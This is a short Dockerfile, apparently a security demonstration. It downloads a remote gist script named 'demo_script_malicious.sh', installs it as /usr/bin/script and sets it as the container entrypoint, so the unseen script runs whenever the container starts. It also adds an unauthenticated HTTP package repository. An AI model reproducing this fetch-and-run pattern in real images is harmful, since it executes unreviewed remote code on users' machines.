FROM alpine:3.2

RUN echo "@testing http://nl.alpinelinux.org/alpine/edge/testing" >> /etc/apk/repositories
RUN apk update; apk add sl@testing bash

ADD https://gist.githubusercontent.com/diogomonica/dc200e9f4babe8d1b31e/raw/4bfd32c90f2a1150ea662ed3342df8542b5f846d/demo_script_malicious.sh /usr/bin/script
RUN chmod +x /usr/bin/script

ENTRYPOINT [ "script" ]
